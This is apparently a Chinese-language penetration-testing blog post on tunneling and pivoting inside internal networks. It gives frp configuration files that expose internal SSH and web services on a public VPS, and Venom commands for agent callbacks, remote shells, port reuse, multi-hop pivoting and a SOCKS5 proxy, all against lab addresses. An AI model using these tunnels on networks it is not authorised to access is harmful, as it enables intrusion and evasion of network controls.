内网渗透 常用的隧道代理技术

简单整理一下工具的使用

Posted by BY Diego on July 21, 2021

frp 内网穿透

https://github.com/fatedier/frp

将内网的服务代理到公网vps中

vps 上配置( frps.ini)

[common]
bind_port = 8005        # 隧道绑定的端口
token = 123456789       # 认证密码
vhost_http_port = 8007   # 内网http服务映射到公网vps上的port
vhost_https_port = 8007   #内网https服务映射到公网vps上的port

内网服务(frpc.ini)

[common]
server_addr = vps_ip
server_port = 8005
token = 123456789

[ssh]  # 转发内网ssh  转发其他端口也一样 名称无所谓
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 8006

[web] # 转发内网 http
custom_domains = vps_ip
type = http
local_port = 80

vps 上执行

./frps -c frps.ini

客户端

./frpc -c frpc.ini

ssh 连接 vps对应ssh端口

web 服务

(内)

(外)

Venom

项目地址 https://github.com/Dliv3/Venom

基本使用

image-20210225214211935

#admin端
admin -lport 8888
#客户端
agent -rhost ip -rport 8888

image-20210225214537858

show # 查看已连接的shell。(包含拓扑
goto  1 # 序号
shell # 进行连接shell

image-20210226195928859

image-20210225214557187

端口复用

在其他端口不开放的情况下 可以端口复用

#windows下 ip为执行命令的ip
agent.exe -lhost ip -reuse-port 80 
#监听
admin.exe -rhost ip -port 80

A0E776A3AC9FD94BC5E786AA90EA2FDC

3C54B43A-5B5D-4B83-84B4-0ECCAEB45102

多级代理

起一个admin (Mac os 192.168.0.127)

./admin_macos_x64 -lport 8888

再启动一个agent (Windows。192.168.0.157) 连接admin

./agent.exe -rhost 192.168.0.127 -rport 8888

image-20210302150229577

下层网络启动 agent (windows 下的虚拟机 192.168.56.105)

./agent_linux_x64 -lport 8888

image-20210302152344989

Admin 下查看show

image-20210302151249120

然后进入 1节点。也就是windows 然后连接虚拟机的agent

goto 1
connect 192.168.56.105 8888

image-20210302153544515

最后 goto 2 就是进入了win 的虚拟机里了

image-20210302145715850

sock5代理

在想要代理出流量的节点上执行如下

socks 端口号

image-20210302162347843

执行后会在本地出现一个代理端口为 7777

然后用socks 连接工具连接上即可

image-20210302162629753

这里用proxychains 访问的结果一致

image-20210302162706501